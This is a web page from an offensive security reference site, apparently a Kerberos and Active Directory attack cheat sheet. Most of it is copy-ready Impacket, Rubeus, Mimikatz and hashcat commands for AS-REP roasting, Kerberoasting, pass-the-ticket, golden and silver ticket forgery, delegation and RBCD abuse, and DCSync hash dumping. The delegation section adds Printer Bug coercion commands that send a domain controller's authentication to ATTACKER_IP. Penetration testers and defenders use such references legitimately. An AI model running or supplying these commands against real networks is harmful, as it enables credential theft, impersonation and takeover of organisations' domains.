KagisoSec_
Service bank
DIRECTORY / AD 88/tcp

Kerberos Attacks

aka AS-REP Roasting, Kerberoasting, Golden Ticket, Silver Ticket, Pass-the-Ticket

Kerberos attack toolkit: AS-REP Roasting, Kerberoasting, Pass-the-Ticket, Overpass-the-Hash, Golden and Silver tickets, unconstrained/constrained/RBCD delegation abuse, and Bronze Bit. Impacket + Rubeus reference.

windows active-directory kerberos rubeus impacket

Ports

PortProtoNotes
88tcpKerberos — all ticket operations

Fingerprint

  • Port 88 open = Kerberos KDC (Domain Controller)
  • TGT format: Base64 blob starting with DOIFXXX (Rubeus) or ccache file (Impacket)

Key files

PathHoldsSensitive
NTDS.dit + SYSTEM hive all domain hashes (DCSync extracts without touching the file) sensitive
lsass.exe memory Kerberos tickets, NT hashes, plaintext creds (Windows older than 8.1) sensitive

Exploitation primitives

  • AS-REP Roast: crack TGT for users with DONT_REQ_PREAUTH set (hashcat -m 18200)
  • Kerberoast: any domain user can request TGS for any SPN; crack offline (hashcat -m 13100)
  • Golden ticket: forge TGT from krbtgt hash → any user, any group, 10-year validity
  • Silver ticket: forge TGS for a specific service using service account hash
  • Unconstrained delegation: coerce privileged auth to capture TGT via Printer Bug / PetitPotam

AS-REP Roasting

Accounts with DONT_REQ_PREAUTH set allow requesting a TGT without knowing the password. The encrypted part is crackable offline.

Enumerate targets

# Impacket
GetNPUsers.py domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
GetNPUsers.py domain.local/user:pass -request -format hashcat -dc-ip DC_IP

# CrackMapExec
nxc ldap DC_IP -u user -p pass --asreproast asrep.txt

# PowerView (on Windows)
Get-DomainUser -KerberosPreauthNotRequired | select samaccountname

Crack

hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

Kerberoasting

Any authenticated domain user can request a TGS for any account with a Service Principal Name (SPN). The TGS is encrypted with the service account’s password hash → crack offline.

Enumerate SPNs and request tickets

# Impacket
GetUserSPNs.py domain.local/user:pass -dc-ip DC_IP -request -outputfile tgs.txt

# CME
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt

# Rubeus (on Windows)
.\Rubeus.exe kerberoast /nowrap /outfile:tgs.txt

# Targeted (specific user)
.\Rubeus.exe kerberoast /user:sqlsvc /nowrap

Crack

hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt

Kerberoast without preauth (CWEE-style chaining)

Combine AS-REP Roasting + Kerberoasting:

# Use an ASREP-roastable account to request TGS for an SPN (no password needed)
.\Rubeus.exe kerberoast /nopreauth:asrep_user /spn:MSSQLSvc/sqlserver:1433 /domain:domain.local

Pass-the-Ticket (PTT)

Inject an existing Kerberos ticket (.ccache or Rubeus base64) into your session:

# Linux — set KRB5CCNAME environment variable
export KRB5CCNAME=/path/to/ticket.ccache
secretsdump.py -k -no-pass dc.domain.local

# Windows — Rubeus inject
.\Rubeus.exe ptt /ticket:BASE64_TICKET
klist  # verify ticket is loaded

Overpass-the-Hash (PTK — Pass-the-Key)

Use an NT hash or AES key to obtain a Kerberos TGT (avoids NTLM entirely):

# Impacket (Linux)
getTGT.py domain.local/user -hashes :NThash -dc-ip DC_IP
export KRB5CCNAME=user.ccache
wmiexec.py -k -no-pass domain.local/user@target

# Rubeus (Windows)
.\Rubeus.exe asktgt /user:user /rc4:NThash /ptt
.\Rubeus.exe asktgt /user:user /aes256:AES256KEY /ptt

Golden Ticket

Requires the krbtgt hash (obtained via DCSync, domain admin session, or NTDS.dit dump).

Get krbtgt hash

# DCSync (requires replication rights)
secretsdump.py -just-dc-user krbtgt domain.local/administrator:pass@DC_IP
mimikatz: lsadump::dcsync /user:krbtgt

Forge the ticket

# Impacket (Linux)
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXXXX -domain domain.local -user-id 500 Administrator
export KRB5CCNAME=Administrator.ccache
wmiexec.py -k -no-pass domain.local/Administrator@target

# Rubeus (Windows)
.\Rubeus.exe golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /rc4:KRBTGT_HASH /ptt

# Mimikatz (Windows)
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-XXXXX /krbtgt:HASH /ptt

Silver Ticket

Forge a TGS for a specific service using the service account’s hash. No KDC contact required.

# Impacket
ticketer.py -nthash SERVICE_ACCOUNT_HASH -domain-sid S-1-5-21-XXXXX -domain domain.local -spn CIFS/target.domain.local Administrator
export KRB5CCNAME=Administrator.ccache

# Rubeus
.\Rubeus.exe silver /user:Administrator /service:cifs/target.domain.local /rc4:SERVICE_HASH /domain:domain.local /sid:S-1-5-21-XXXXX /ptt

# Mimikatz
kerberos::golden /user:Administrator /service:cifs /target:target.domain.local /rc4:SERVICE_HASH /sid:S-1-5-21-XXXXX /ptt

Unconstrained Delegation

Computers with TrustedForDelegation store TGTs of any user that authenticates to them. Compromise that computer → capture DA TGT.

Find unconstrained delegation hosts

nxc ldap DC_IP -u user -p pass --trusted-for-delegation
Get-DomainComputer -Unconstrained | select dnshostname

Capture TGTs with Rubeus (on the compromised host)

.\Rubeus.exe monitor /interval:5 /targetuser:Administrator

Coerce DC authentication (Printer Bug)

# MS-RPRN SpoolSample
.\SpoolSample.exe DC_IP ATTACKER_IP  # Windows
python3 printerbug.py 'domain.local/user:pass'@DC_IP ATTACKER_IP  # Linux

Extract and use the TGT

.\Rubeus.exe ptt /ticket:BASE64_TGT

Constrained Delegation

Accounts allowed to delegate to specific SPNs (via msDS-AllowedToDelegateTo).

Find constrained delegation accounts

nxc ldap DC_IP -u user -p pass --trusted-for-delegation  # also shows constrained
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth | select dnshostname, msds-allowedtodelegateto

S4U2Self + S4U2Proxy attack

# Rubeus — request a service ticket impersonating Administrator
.\Rubeus.exe s4u /user:constrained_svc /rc4:HASH /impersonateuser:Administrator /msdsspn:CIFS/target.domain.local /ptt

# Impacket
getST.py -spn cifs/target.domain.local -impersonate Administrator -dc-ip DC_IP domain.local/constrained_svc:pass
export KRB5CCNAME=Administrator.ccache

Resource-Based Constrained Delegation (RBCD)

Set msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer to allow a controlled account to delegate to it.

Requirements

  • Write access over the target computer object (GenericWrite, GenericAll, WriteDACL on the computer object)
  • A computer account (or existing machine account) you control

Exploit

# 1. Create a fake computer account (if MachineAccountQuota > 0)
addcomputer.py -computer-name 'FAKEPC$' -computer-pass 'FakePass123!' domain.local/user:pass -dc-ip DC_IP

# 2. Set RBCD on the target computer
rbcd.py -delegate-from 'FAKEPC$' -delegate-to 'TARGET$' -action write domain.local/user:pass -dc-ip DC_IP

# 3. Get impersonation ticket
getST.py -spn cifs/TARGET.domain.local -impersonate Administrator -dc-ip DC_IP domain.local/'FAKEPC$:FakePass123!'
export KRB5CCNAME=Administrator.ccache

# 4. Use it
secretsdump.py -k -no-pass TARGET.domain.local

DCSync

Pull all domain hashes by impersonating a DC’s replication process. Requires Replicating Directory Changes All (or higher) rights.

# Impacket
secretsdump.py domain.local/user:pass@DC_IP -just-dc-ntlm
secretsdump.py -just-dc-user krbtgt domain.local/user:pass@DC_IP

# Mimikatz (on Windows, domain-joined)
mimikatz: lsadump::dcsync /domain:domain.local /user:Administrator
mimikatz: lsadump::dcsync /domain:domain.local /all /csv

References